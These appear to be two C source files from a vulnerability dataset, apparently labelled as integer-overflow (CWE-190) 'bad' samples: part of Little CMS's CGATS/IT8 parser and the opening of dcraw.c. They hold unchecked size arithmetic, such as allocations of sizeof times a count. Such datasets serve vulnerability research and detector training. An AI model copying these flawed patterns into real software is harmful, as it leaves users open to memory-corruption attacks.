// Returns 0 if this does not look like CGATS, otherwise the number of words found in that first line.
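// Example (illustrative): a first line of "IT8.7/2" counts as one word and is accepted,
// while any byte outside the printable ASCII range causes immediate rejection.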
static
int IsMyBlock(const cmsUInt8Number* Buffer, cmsUInt32Number n)
{
int words = 1, space = 0, quot = 0;
cmsUInt32Number i;
if (n < 10) return 0; // Too small
if (n > 132)
n = 132;
for (i = 1; i < n; i++) {
switch(Buffer[i])
{
case '\n':
case '\r':
return ((quot == 1) || (words > 2)) ? 0 : words;
case '\t':
case ' ':
if(!quot && !space)
space = 1;
break;
case '\"':
quot = !quot;
break;
default:
if (Buffer[i] < 32) return 0;
if (Buffer[i] > 127) return 0;
words += space;
space = 0;
break;
}
}
return 0;
}
static
cmsBool IsMyFile(const char* FileName)
{
FILE *fp;
cmsUInt32Number Size;
cmsUInt8Number Ptr[133];
fp = fopen(FileName, "rt");
if (!fp) {
cmsSignalError(0, cmsERROR_FILE, "File '%s' not found", FileName);
return FALSE;
}
Size = (cmsUInt32Number) fread(Ptr, 1, 132, fp);
if (fclose(fp) != 0)
return FALSE;
Ptr[Size] = '\0';
return IsMyBlock(Ptr, Size);
}
// ---------------------------------------------------------- Exported routines
cmsHANDLE CMSEXPORT cmsIT8LoadFromMem(cmsContext ContextID, const void *Ptr, cmsUInt32Number len)
{
cmsHANDLE hIT8;
cmsIT8* it8;
int type;
_cmsAssert(Ptr != NULL);
_cmsAssert(len != 0);
type = IsMyBlock((const cmsUInt8Number*)Ptr, len);
if (type == 0) return NULL;
hIT8 = cmsIT8Alloc(ContextID);
if (!hIT8) return NULL;
it8 = (cmsIT8*) hIT8;
it8 ->MemoryBlock = (char*) _cmsMalloc(ContextID, len + 1);
if (it8->MemoryBlock == NULL)
{
cmsIT8Free(hIT8);
return FALSE;
}
strncpy(it8 ->MemoryBlock, (const char*) Ptr, len);
it8 ->MemoryBlock[len] = 0;
strncpy(it8->FileStack[0]->FileName, "", cmsMAX_PATH-1);
it8-> Source = it8 -> MemoryBlock;
if (!ParseIT8(it8, type-1)) {
cmsIT8Free(hIT8);
return FALSE;
}
CookPointers(it8);
it8 ->nTable = 0;
_cmsFree(ContextID, it8->MemoryBlock);
it8 -> MemoryBlock = NULL;
return hIT8;
}
cmsHANDLE CMSEXPORT cmsIT8LoadFromFile(cmsContext ContextID, const char* cFileName)
{
cmsHANDLE hIT8;
cmsIT8* it8;
int type;
_cmsAssert(cFileName != NULL);
type = IsMyFile(cFileName);
if (type == 0) return NULL;
hIT8 = cmsIT8Alloc(ContextID);
it8 = (cmsIT8*) hIT8;
if (!hIT8) return NULL;
it8 ->FileStack[0]->Stream = fopen(cFileName, "rt");
if (!it8 ->FileStack[0]->Stream) {
cmsIT8Free(hIT8);
return NULL;
}
strncpy(it8->FileStack[0]->FileName, cFileName, cmsMAX_PATH-1);
it8->FileStack[0]->FileName[cmsMAX_PATH-1] = 0;
if (!ParseIT8(it8, type-1)) {
fclose(it8 ->FileStack[0]->Stream);
cmsIT8Free(hIT8);
return NULL;
}
CookPointers(it8);
it8 ->nTable = 0;
if (fclose(it8 ->FileStack[0]->Stream)!= 0) {
cmsIT8Free(hIT8);
return NULL;
}
return hIT8;
}
int CMSEXPORT cmsIT8EnumDataFormat(cmsHANDLE hIT8, char ***SampleNames)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
TABLE* t;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
if (SampleNames)
*SampleNames = t -> DataFormat;
return t -> nSamples;
}
cmsUInt32Number CMSEXPORT cmsIT8EnumProperties(cmsHANDLE hIT8, char ***PropertyNames)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
KEYVALUE* p;
cmsUInt32Number n;
char **Props;
TABLE* t;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
// Pass#1 - count properties
n = 0;
for (p = t -> HeaderList; p != NULL; p = p->Next) {
n++;
}
Props = (char **) AllocChunk(it8, sizeof(char *) * n);
// Pass#2 - Fill pointers
n = 0;
for (p = t -> HeaderList; p != NULL; p = p->Next) {
Props[n++] = p -> Keyword;
}
*PropertyNames = Props;
return n;
}
cmsUInt32Number CMSEXPORT cmsIT8EnumPropertyMulti(cmsHANDLE hIT8, const char* cProp, const char ***SubpropertyNames)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
KEYVALUE *p, *tmp;
cmsUInt32Number n;
const char **Props;
TABLE* t;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
if(!IsAvailableOnList(t->HeaderList, cProp, NULL, &p)) {
*SubpropertyNames = 0;
return 0;
}
// Pass#1 - count properties
n = 0;
for (tmp = p; tmp != NULL; tmp = tmp->NextSubkey) {
if(tmp->Subkey != NULL)
n++;
}
Props = (const char **) AllocChunk(it8, sizeof(char *) * n);
// Pass#2 - Fill pointers
n = 0;
for (tmp = p; tmp != NULL; tmp = tmp->NextSubkey) {
if(tmp->Subkey != NULL)
Props[n++] = tmp ->Subkey;
}
*SubpropertyNames = Props;
return n;
}
static
int LocatePatch(cmsIT8* it8, const char* cPatch)
{
int i;
const char *data;
TABLE* t = GetTable(it8);
for (i=0; i < t-> nPatches; i++) {
data = GetData(it8, i, t->SampleID);
if (data != NULL) {
if (cmsstrcasecmp(data, cPatch) == 0)
return i;
}
}
// SynError(it8, "Couldn't find patch '%s'\n", cPatch);
return -1;
}
static
int LocateEmptyPatch(cmsIT8* it8)
{
int i;
const char *data;
TABLE* t = GetTable(it8);
for (i=0; i < t-> nPatches; i++) {
data = GetData(it8, i, t->SampleID);
if (data == NULL)
return i;
}
return -1;
}
static
int LocateSample(cmsIT8* it8, const char* cSample)
{
int i;
const char *fld;
TABLE* t = GetTable(it8);
for (i=0; i < t->nSamples; i++) {
fld = GetDataFormat(it8, i);
if (fld != NULL) {
if (cmsstrcasecmp(fld, cSample) == 0)
return i;
}
}
return -1;
}
int CMSEXPORT cmsIT8FindDataFormat(cmsHANDLE hIT8, const char* cSample)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
return LocateSample(it8, cSample);
}
const char* CMSEXPORT cmsIT8GetDataRowCol(cmsHANDLE hIT8, int row, int col)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
return GetData(it8, row, col);
}
cmsFloat64Number CMSEXPORT cmsIT8GetDataRowColDbl(cmsHANDLE hIT8, int row, int col)
{
const char* Buffer;
Buffer = cmsIT8GetDataRowCol(hIT8, row, col);
if (Buffer == NULL) return 0.0;
return ParseFloatNumber(Buffer);
}
cmsBool CMSEXPORT cmsIT8SetDataRowCol(cmsHANDLE hIT8, int row, int col, const char* Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
return SetData(it8, row, col, Val);
}
cmsBool CMSEXPORT cmsIT8SetDataRowColDbl(cmsHANDLE hIT8, int row, int col, cmsFloat64Number Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
char Buff[256];
_cmsAssert(hIT8 != NULL);
snprintf(Buff, 255, it8->DoubleFormatter, Val);
return SetData(it8, row, col, Buff);
}
const char* CMSEXPORT cmsIT8GetData(cmsHANDLE hIT8, const char* cPatch, const char* cSample)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
int iField, iSet;
_cmsAssert(hIT8 != NULL);
iField = LocateSample(it8, cSample);
if (iField < 0) {
return NULL;
}
iSet = LocatePatch(it8, cPatch);
if (iSet < 0) {
return NULL;
}
return GetData(it8, iSet, iField);
}
cmsFloat64Number CMSEXPORT cmsIT8GetDataDbl(cmsHANDLE it8, const char* cPatch, const char* cSample)
{
const char* Buffer;
Buffer = cmsIT8GetData(it8, cPatch, cSample);
return ParseFloatNumber(Buffer);
}
cmsBool CMSEXPORT cmsIT8SetData(cmsHANDLE hIT8, const char* cPatch, const char* cSample, const char *Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
int iField, iSet;
TABLE* t;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
iField = LocateSample(it8, cSample);
if (iField < 0)
return FALSE;
if (t-> nPatches == 0) {
AllocateDataFormat(it8);
AllocateDataSet(it8);
CookPointers(it8);
}
if (cmsstrcasecmp(cSample, "SAMPLE_ID") == 0) {
iSet = LocateEmptyPatch(it8);
if (iSet < 0) {
return SynError(it8, "Couldn't add more patches '%s'\n", cPatch);
}
iField = t -> SampleID;
}
else {
iSet = LocatePatch(it8, cPatch);
if (iSet < 0) {
return FALSE;
}
}
return SetData(it8, iSet, iField, Val);
}
cmsBool CMSEXPORT cmsIT8SetDataDbl(cmsHANDLE hIT8, const char* cPatch,
const char* cSample,
cmsFloat64Number Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
char Buff[256];
_cmsAssert(hIT8 != NULL);
snprintf(Buff, 255, it8->DoubleFormatter, Val);
return cmsIT8SetData(hIT8, cPatch, cSample, Buff);
}
// The supplied buffer, if not NULL, should be at least MAXSTR bytes long
const char* CMSEXPORT cmsIT8GetPatchName(cmsHANDLE hIT8, int nPatch, char* buffer)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
TABLE* t;
char* Data;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
Data = GetData(it8, nPatch, t->SampleID);
if (!Data) return NULL;
if (!buffer) return Data;
strncpy(buffer, Data, MAXSTR-1);
buffer[MAXSTR-1] = 0;
return buffer;
}
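// A minimal usage sketch (illustrative; hIT8 stands for any open handle):
// the caller either supplies a buffer of at least MAXSTR bytes or passes
// NULL to receive a pointer into the table's own storage.
//
//     char name[MAXSTR];
//     if (cmsIT8GetPatchName(hIT8, 0, name) != NULL)
//         printf("First patch is '%s'\n", name);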
int CMSEXPORT cmsIT8GetPatchByName(cmsHANDLE hIT8, const char *cPatch)
{
_cmsAssert(hIT8 != NULL);
return LocatePatch((cmsIT8*)hIT8, cPatch);
}
cmsUInt32Number CMSEXPORT cmsIT8TableCount(cmsHANDLE hIT8)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
return it8 ->TablesCount;
}
// This handles the "LABEL" extension.
// Label, nTable, Type
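// Illustrative example (the concrete names below are assumed, not from the
// original source): if the addressed field of the given set holds
//
//     "CC_PATCHES 2 XYZ_DATA"
//
// then Label = "CC_PATCHES", nTable = 2 and Type = "XYZ_DATA"; the call
// switches to table #2 provided ExpectedType is NULL, empty, or matches
// "XYZ_DATA" case-insensitively.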
int CMSEXPORT cmsIT8SetTableByLabel(cmsHANDLE hIT8, const char* cSet, const char* cField, const char* ExpectedType)
{
const char* cLabelFld;
char Type[256], Label[256];
cmsUInt32Number nTable;
_cmsAssert(hIT8 != NULL);
if (cField != NULL && *cField == 0)
cField = "LABEL";
if (cField == NULL)
cField = "LABEL";
cLabelFld = cmsIT8GetData(hIT8, cSet, cField);
if (!cLabelFld) return -1;
if (sscanf(cLabelFld, "%255s %u %255s", Label, &nTable, Type) != 3)
return -1;
if (ExpectedType != NULL && *ExpectedType == 0)
ExpectedType = NULL;
if (ExpectedType) {
if (cmsstrcasecmp(Type, ExpectedType) != 0) return -1;
}
return cmsIT8SetTable(hIT8, nTable);
}
cmsBool CMSEXPORT cmsIT8SetIndexColumn(cmsHANDLE hIT8, const char* cSample)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
int pos;
_cmsAssert(hIT8 != NULL);
pos = LocateSample(it8, cSample);
if(pos == -1)
return FALSE;
it8->Tab[it8->nTable].SampleID = pos;
return TRUE;
}
void CMSEXPORT cmsIT8DefineDblFormat(cmsHANDLE hIT8, const char* Formatter)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
if (Formatter == NULL)
strcpy(it8->DoubleFormatter, DEFAULT_DBL_FORMAT);
else
strncpy(it8->DoubleFormatter, Formatter, sizeof(it8->DoubleFormatter));
it8 ->DoubleFormatter[sizeof(it8 ->DoubleFormatter)-1] = 0;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_352_9 |
crossvul-cpp_data_bad_582_0 | #ifndef IGNOREALL
/*
dcraw.c -- Dave Coffin's raw photo decoder
Copyright 1997-2015 by Dave Coffin, dcoffin a cybercom o net
This is a command-line ANSI C program to convert raw photos from
any digital camera on any computer running any operating system.
No license is required to download and use dcraw.c. However,
to lawfully redistribute dcraw, you must either (a) offer, at
no extra charge, full source code* for all executable files
containing RESTRICTED functions, (b) distribute this code under
the GPL Version 2 or later, (c) remove all RESTRICTED functions,
re-implement them, or copy them from an earlier, unrestricted
Revision of dcraw.c, or (d) purchase a license from the author.
The functions that process Foveon images have been RESTRICTED
since Revision 1.237. All other code remains free for all uses.
*If you have not modified dcraw.c in any way, a link to my
homepage qualifies as "full source code".
$Revision: 1.476 $
$Date: 2015/05/25 02:29:14 $
*/
/*@out DEFINES
#ifndef USE_JPEG
#define NO_JPEG
#endif
#ifndef USE_JASPER
#define NO_JASPER
#endif
@end DEFINES */
#define NO_LCMS
#define DCRAW_VERBOSE
//@out DEFINES
#define DCRAW_VERSION "9.26"
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#define _USE_MATH_DEFINES
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <float.h>
#include <limits.h>
#include <math.h>
#include <setjmp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
//@end DEFINES
#if defined(DJGPP) || defined(__MINGW32__)
#define fseeko fseek
#define ftello ftell
#else
#define fgetc getc_unlocked
#endif
//@out DEFINES
#ifdef __CYGWIN__
#include <io.h>
#endif
#if defined WIN32 || defined (__MINGW32__)
#include <sys/utime.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define snprintf _snprintf
#define strcasecmp stricmp
#define strncasecmp strnicmp
//@end DEFINES
typedef __int64 INT64;
typedef unsigned __int64 UINT64;
//@out DEFINES
#else
#include <unistd.h>
#include <utime.h>
#include <netinet/in.h>
typedef long long INT64;
typedef unsigned long long UINT64;
#endif
#ifdef NODEPS
#define NO_JASPER
#define NO_JPEG
#define NO_LCMS
#endif
#ifndef NO_JASPER
#include <jasper/jasper.h> /* Decode Red camera movies */
#endif
#ifndef NO_JPEG
#include <jpeglib.h> /* Decode compressed Kodak DC120 photos */
#endif /* and Adobe Lossy DNGs */
#ifndef NO_LCMS
#ifdef USE_LCMS
#include <lcms.h> /* Support color profiles */
#else
#include <lcms2.h> /* Support color profiles */
#endif
#endif
#ifdef LOCALEDIR
#include <libintl.h>
#define _(String) gettext(String)
#else
#define _(String) (String)
#endif
#ifdef LJPEG_DECODE
#error Please compile dcraw.c by itself.
#error Do not link it with ljpeg_decode.
#endif
#ifndef LONG_BIT
#define LONG_BIT (8 * sizeof (long))
#endif
//@end DEFINES
#if !defined(uchar)
#define uchar unsigned char
#endif
#if !defined(ushort)
#define ushort unsigned short
#endif
/*
All global variables are defined here, and all functions that
access them are prefixed with "CLASS". Note that a thread-safe
C++ class cannot have non-const static local variables.
*/
FILE *ifp, *ofp;
short order;
const char *ifname;
char *meta_data, xtrans[6][6], xtrans_abs[6][6];
char cdesc[5], desc[512], make[64], model[64], model2[64], artist[64],software[64];
float flash_used, canon_ev, iso_speed, shutter, aperture, focal_len;
time_t timestamp;
off_t strip_offset, data_offset;
off_t thumb_offset, meta_offset, profile_offset;
unsigned shot_order, kodak_cbpp, exif_cfa, unique_id;
unsigned thumb_length, meta_length, profile_length;
unsigned thumb_misc, *oprof, fuji_layout, shot_select=0, multi_out=0;
unsigned tiff_nifds, tiff_samples, tiff_bps, tiff_compress;
unsigned black, maximum, mix_green, raw_color, zero_is_bad;
unsigned zero_after_ff, is_raw, dng_version, is_foveon, data_error;
unsigned tile_width, tile_length, gpsdata[32], load_flags;
unsigned flip, tiff_flip, filters, colors;
ushort raw_height, raw_width, height, width, top_margin, left_margin;
ushort shrink, iheight, iwidth, fuji_width, thumb_width, thumb_height;
ushort *raw_image, (*image)[4], cblack[4102];
ushort white[8][8], curve[0x10000], cr2_slice[3], sraw_mul[4];
double pixel_aspect, aber[4]={1,1,1,1}, gamm[6]={ 0.45,4.5,0,0,0,0 };
float bright=1, user_mul[4]={0,0,0,0}, threshold=0;
int mask[8][4];
int half_size=0, four_color_rgb=0, document_mode=0, highlight=0;
int verbose=0, use_auto_wb=0, use_camera_wb=0, use_camera_matrix=1;
int output_color=1, output_bps=8, output_tiff=0, med_passes=0;
int no_auto_bright=0;
unsigned greybox[4] = { 0, 0, UINT_MAX, UINT_MAX };
float cam_mul[4], pre_mul[4], cmatrix[3][4], rgb_cam[3][4];
const double xyz_rgb[3][3] = { /* XYZ from RGB */
{ 0.412453, 0.357580, 0.180423 },
{ 0.212671, 0.715160, 0.072169 },
{ 0.019334, 0.119193, 0.950227 } };
const float d65_white[3] = { 0.950456, 1, 1.088754 };
int histogram[4][0x2000];
void (*write_thumb)(), (*write_fun)();
void (*load_raw)(), (*thumb_load_raw)();
jmp_buf failure;
struct decode {
struct decode *branch[2];
int leaf;
} first_decode[2048], *second_decode, *free_decode;
struct tiff_ifd {
int t_width, t_height, bps, comp, phint, offset, t_flip, samples, bytes;
int t_tile_width, t_tile_length,sample_format,predictor;
float t_shutter;
} tiff_ifd[10];
struct ph1 {
int format, key_off, tag_21a;
int t_black, split_col, black_col, split_row, black_row;
float tag_210;
} ph1;
#define CLASS
//@out DEFINES
#define FORC(cnt) for (c=0; c < cnt; c++)
#define FORC3 FORC(3)
#define FORC4 FORC(4)
#define FORCC for (c=0; c < colors && c < 4; c++)
#define SQR(x) ((x)*(x))
#define ABS(x) (((int)(x) ^ ((int)(x) >> 31)) - ((int)(x) >> 31))
#define MIN(a,b) ((a) < (b) ? (a) : (b))
#define MAX(a,b) ((a) > (b) ? (a) : (b))
#define LIM(x,min,max) MAX(min,MIN(x,max))
#define ULIM(x,y,z) ((y) < (z) ? LIM(x,y,z) : LIM(x,z,y))
#define CLIP(x) LIM((int)(x),0,65535)
#define SWAP(a,b) { a=a+b; b=a-b; a=a-b; }
#define my_swap(type, i, j) {type t = i; i = j; j = t;}
static float fMAX(float a, float b)
{
return MAX(a,b);
}
/*
In order to inline this calculation, I make the risky
assumption that all filter patterns can be described
by a repeating pattern of eight rows and two columns.
Do not use the FC or BAYER macros with the Leaf CatchLight,
because its pattern is 16x16, not 2x8.
Return values are either 0/1/2/3 = G/M/C/Y or 0/1/2/3 = R/G1/B/G2
PowerShot 600 PowerShot A50 PowerShot Pro70 Pro90 & G1
0xe1e4e1e4: 0x1b4e4b1e: 0x1e4b4e1b: 0xb4b4b4b4:
0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5
0 G M G M G M 0 C Y C Y C Y 0 Y C Y C Y C 0 G M G M G M
1 C Y C Y C Y 1 M G M G M G 1 M G M G M G 1 Y C Y C Y C
2 M G M G M G 2 Y C Y C Y C 2 C Y C Y C Y
3 C Y C Y C Y 3 G M G M G M 3 G M G M G M
4 C Y C Y C Y 4 Y C Y C Y C
PowerShot A5 5 G M G M G M 5 G M G M G M
0x1e4e1e4e: 6 Y C Y C Y C 6 C Y C Y C Y
7 M G M G M G 7 M G M G M G
0 1 2 3 4 5
0 C Y C Y C Y
1 G M G M G M
2 C Y C Y C Y
3 M G M G M G
All RGB cameras use one of these Bayer grids:
0x16161616: 0x61616161: 0x49494949: 0x94949494:
0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5
0 B G B G B G 0 G R G R G R 0 G B G B G B 0 R G R G R G
1 G R G R G R 1 B G B G B G 1 R G R G R G 1 G B G B G B
2 B G B G B G 2 G R G R G R 2 G B G B G B 2 R G R G R G
3 G R G R G R 3 B G B G B G 3 R G R G R G 3 G B G B G B
*/
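/*
   Worked example (added for illustration): with filters = 0x94949494 the
   FC macro below extracts two bits per cell, so
       FC(0,0) = (0x94949494 >> 0) & 3 = 0 = R
       FC(0,1) = (0x94949494 >> 2) & 3 = 1 = G
       FC(1,0) = (0x94949494 >> 4) & 3 = 1 = G
       FC(1,1) = (0x94949494 >> 6) & 3 = 2 = B
   which reproduces the R/G/G/B pattern shown in the rightmost grid above.
 */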
#define RAWINDEX(row, col) ((row)*raw_width + (col))
#define RAW(row,col) \
raw_image[(row)*raw_width+(col)]
//@end DEFINES
#define FC(row,col) \
(filters >> ((((row) << 1 & 14) + ((col) & 1)) << 1) & 3)
//@out DEFINES
#define BAYER(row,col) \
image[((row) >> shrink)*iwidth + ((col) >> shrink)][FC(row,col)]
#define BAYER2(row,col) \
image[((row) >> shrink)*iwidth + ((col) >> shrink)][fcol(row,col)]
//@end DEFINES
/* @out COMMON
#include <math.h>
#define CLASS LibRaw::
#include "libraw/libraw_types.h"
#define LIBRAW_LIBRARY_BUILD
#define LIBRAW_IO_REDEFINED
#include "libraw/libraw.h"
#include "internal/defines.h"
#include "internal/var_defines.h"
@end COMMON */
//@out COMMON
int CLASS fcol (int row, int col)
{
static const char filter[16][16] =
{ { 2,1,1,3,2,3,2,0,3,2,3,0,1,2,1,0 },
{ 0,3,0,2,0,1,3,1,0,1,1,2,0,3,3,2 },
{ 2,3,3,2,3,1,1,3,3,1,2,1,2,0,0,3 },
{ 0,1,0,1,0,2,0,2,2,0,3,0,1,3,2,1 },
{ 3,1,1,2,0,1,0,2,1,3,1,3,0,1,3,0 },
{ 2,0,0,3,3,2,3,1,2,0,2,0,3,2,2,1 },
{ 2,3,3,1,2,1,2,1,2,1,1,2,3,0,0,1 },
{ 1,0,0,2,3,0,0,3,0,3,0,3,2,1,2,3 },
{ 2,3,3,1,1,2,1,0,3,2,3,0,2,3,1,3 },
{ 1,0,2,0,3,0,3,2,0,1,1,2,0,1,0,2 },
{ 0,1,1,3,3,2,2,1,1,3,3,0,2,1,3,2 },
{ 2,3,2,0,0,1,3,0,2,0,1,2,3,0,1,0 },
{ 1,3,1,2,3,2,3,2,0,2,0,1,1,0,3,0 },
{ 0,2,0,3,1,0,0,1,1,3,3,2,3,2,2,1 },
{ 2,1,3,2,3,1,2,1,0,3,0,2,0,2,0,2 },
{ 0,3,1,0,0,2,0,3,2,1,3,1,1,3,1,3 } };
if (filters == 1) return filter[(row+top_margin)&15][(col+left_margin)&15];
if (filters == 9) return xtrans[(row+6) % 6][(col+6) % 6];
return FC(row,col);
}
static size_t local_strnlen(const char *s, size_t n)
{
const char *p = (const char *)memchr(s, 0, n);
return(p ? p-s : n);
}
/* add OS X version check here ?? */
#define strnlen(a,b) local_strnlen(a,b)
#ifdef LIBRAW_LIBRARY_BUILD
static int stread(char *buf, size_t len, LibRaw_abstract_datastream *fp)
{
int r = fp->read(buf,len,1);
buf[len-1] = 0;
return r;
}
#define stmread(buf,maxlen,fp) stread(buf,MIN(maxlen,sizeof(buf)),fp)
#endif
#ifndef __GLIBC__
char *my_memmem (char *haystack, size_t haystacklen,
char *needle, size_t needlelen)
{
char *c;
for (c = haystack; c <= haystack + haystacklen - needlelen; c++)
if (!memcmp (c, needle, needlelen))
return c;
return 0;
}
#define memmem my_memmem
char *my_strcasestr (char *haystack, const char *needle)
{
char *c;
for (c = haystack; *c; c++)
if (!strncasecmp(c, needle, strlen(needle)))
return c;
return 0;
}
#define strcasestr my_strcasestr
#endif
#define strbuflen(buf) strnlen(buf,sizeof(buf)-1)
//@end COMMON
void CLASS merror (void *ptr, const char *where)
{
if (ptr) return;
fprintf (stderr,_("%s: Out of memory in %s\n"), ifname, where);
longjmp (failure, 1);
}
void CLASS derror()
{
if (!data_error) {
fprintf (stderr, "%s: ", ifname);
if (feof(ifp))
fprintf (stderr,_("Unexpected end of file\n"));
else
fprintf (stderr,_("Corrupt data near 0x%llx\n"), (INT64) ftello(ifp));
}
data_error++;
}
//@out COMMON
ushort CLASS sget2 (uchar *s)
{
if (order == 0x4949) /* "II" means little-endian */
return s[0] | s[1] << 8;
else /* "MM" means big-endian */
return s[0] << 8 | s[1];
}
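/* For example: the byte pair { 0x34, 0x12 } decodes to 0x1234 when
   order == 0x4949 ("II", little-endian) and to 0x3412 when
   order == 0x4d4d ("MM", big-endian). */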
// DNG was written by:
#define CameraDNG 1
#define AdobeDNG 2
#ifdef LIBRAW_LIBRARY_BUILD
static int getwords(char *line, char *words[], int maxwords,int maxlen)
{
line[maxlen-1] = 0;
char *p = line;
int nwords = 0;
while(1)
{
while(isspace(*p)) p++;
if(*p == '\0') return nwords;
words[nwords++] = p;
while(!isspace(*p) && *p != '\0') p++;
if(*p == '\0') return nwords;
*p++ = '\0';
if(nwords >= maxwords) return nwords;
}
}
static ushort saneSonyCameraInfo(uchar a, uchar b, uchar c, uchar d, uchar e, uchar f){
if ((a >> 4) > 9) return 0;
else if ((a & 0x0f) > 9) return 0;
else if ((b >> 4) > 9) return 0;
else if ((b & 0x0f) > 9) return 0;
else if ((c >> 4) > 9) return 0;
else if ((c & 0x0f) > 9) return 0;
else if ((d >> 4) > 9) return 0;
else if ((d & 0x0f) > 9) return 0;
else if ((e >> 4) > 9) return 0;
else if ((e & 0x0f) > 9) return 0;
else if ((f >> 4) > 9) return 0;
else if ((f & 0x0f) > 9) return 0;
return 1;
}
static ushort bcd2dec(uchar data){
if ((data >> 4) > 9) return 0;
else if ((data & 0x0f) > 9) return 0;
else return (data >> 4) * 10 + (data & 0x0f);
}
static uchar SonySubstitution[257] = "\x00\x01\x32\xb1\x0a\x0e\x87\x28\x02\xcc\xca\xad\x1b\xdc\x08\xed\x64\x86\xf0\x4f\x8c\x6c\xb8\xcb\x69\xc4\x2c\x03\x97\xb6\x93\x7c\x14\xf3\xe2\x3e\x30\x8e\xd7\x60\x1c\xa1\xab\x37\xec\x75\xbe\x23\x15\x6a\x59\x3f\xd0\xb9\x96\xb5\x50\x27\x88\xe3\x81\x94\xe0\xc0\x04\x5c\xc6\xe8\x5f\x4b\x70\x38\x9f\x82\x80\x51\x2b\xc5\x45\x49\x9b\x21\x52\x53\x54\x85\x0b\x5d\x61\xda\x7b\x55\x26\x24\x07\x6e\x36\x5b\x47\xb7\xd9\x4a\xa2\xdf\xbf\x12\x25\xbc\x1e\x7f\x56\xea\x10\xe6\xcf\x67\x4d\x3c\x91\x83\xe1\x31\xb3\x6f\xf4\x05\x8a\x46\xc8\x18\x76\x68\xbd\xac\x92\x2a\x13\xe9\x0f\xa3\x7a\xdb\x3d\xd4\xe7\x3a\x1a\x57\xaf\x20\x42\xb2\x9e\xc3\x8b\xf2\xd5\xd3\xa4\x7e\x1f\x98\x9c\xee\x74\xa5\xa6\xa7\xd8\x5e\xb0\xb4\x34\xce\xa8\x79\x77\x5a\xc1\x89\xae\x9a\x11\x33\x9d\xf5\x39\x19\x65\x78\x16\x71\xd2\xa9\x44\x63\x40\x29\xba\xa0\x8f\xe4\xd6\x3b\x84\x0d\xc2\x4e\x58\xdd\x99\x22\x6b\xc9\xbb\x17\x06\xe5\x7d\x66\x43\x62\xf6\xcd\x35\x90\x2e\x41\x8d\x6d\xaa\x09\x73\x95\x0c\xf1\x1d\xde\x4c\x2f\x2d\xf7\xd1\x72\xeb\xef\x48\xc7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff";
ushort CLASS sget2Rev(uchar *s) // specific to some Canon Makernotes fields, where they have endian in reverse
{
if (order == 0x4d4d) /* "II" means little-endian, and we reverse to "MM" - big endian */
return s[0] | s[1] << 8;
else /* "MM" means big-endian... */
return s[0] << 8 | s[1];
}
#endif
ushort CLASS get2()
{
uchar str[2] = { 0xff,0xff };
fread (str, 1, 2, ifp);
return sget2(str);
}
unsigned CLASS sget4 (uchar *s)
{
if (order == 0x4949)
return s[0] | s[1] << 8 | s[2] << 16 | s[3] << 24;
else
return s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3];
}
#define sget4(s) sget4((uchar *)s)
unsigned CLASS get4()
{
uchar str[4] = { 0xff,0xff,0xff,0xff };
fread (str, 1, 4, ifp);
return sget4(str);
}
unsigned CLASS getint (int type)
{
return type == 3 ? get2() : get4();
}
float CLASS int_to_float (int i)
{
union { int i; float f; } u;
u.i = i;
return u.f;
}
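/* getreal() below decodes a value according to its TIFF/EXIF field type.
   The case labels are the standard TIFF type codes (listed here only for
   reference; the mapping is standard TIFF, not specific to this file):
   3 = SHORT, 4 = LONG, 5 = RATIONAL (two LONGs), 8 = SSHORT, 9 = SLONG,
   10 = SRATIONAL, 11 = FLOAT, 12 = DOUBLE; any other type is read as a
   single byte. */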
double CLASS getreal (int type)
{
union { char c[8]; double d; } u,v;
int i, rev;
switch (type) {
case 3: return (unsigned short) get2();
case 4: return (unsigned int) get4();
case 5:
u.d = (unsigned int) get4();
v.d = (unsigned int)get4();
return u.d / (v.d ? v.d : 1);
case 8: return (signed short) get2();
case 9: return (signed int) get4();
case 10:
u.d = (signed int) get4();
v.d = (signed int)get4();
return u.d / (v.d?v.d:1);
case 11: return int_to_float (get4());
case 12:
rev = 7 * ((order == 0x4949) == (ntohs(0x1234) == 0x1234));
for (i=0; i < 8; i++)
u.c[i ^ rev] = fgetc(ifp);
return u.d;
default: return fgetc(ifp);
}
}
void CLASS read_shorts (ushort *pixel, unsigned count)
{
if (fread (pixel, 2, count, ifp) < count) derror();
if ((order == 0x4949) == (ntohs(0x1234) == 0x1234))
swab ((char*)pixel, (char*)pixel, count*2);
}
void CLASS cubic_spline (const int *x_, const int *y_, const int len)
{
float **A, *b, *c, *d, *x, *y;
int i, j;
A = (float **) calloc (((2*len + 4)*sizeof **A + sizeof *A), 2*len);
if (!A) return;
A[0] = (float *) (A + 2*len);
for (i = 1; i < 2*len; i++)
A[i] = A[0] + 2*len*i;
y = len + (x = i + (d = i + (c = i + (b = A[0] + i*i))));
for (i = 0; i < len; i++) {
x[i] = x_[i] / 65535.0;
y[i] = y_[i] / 65535.0;
}
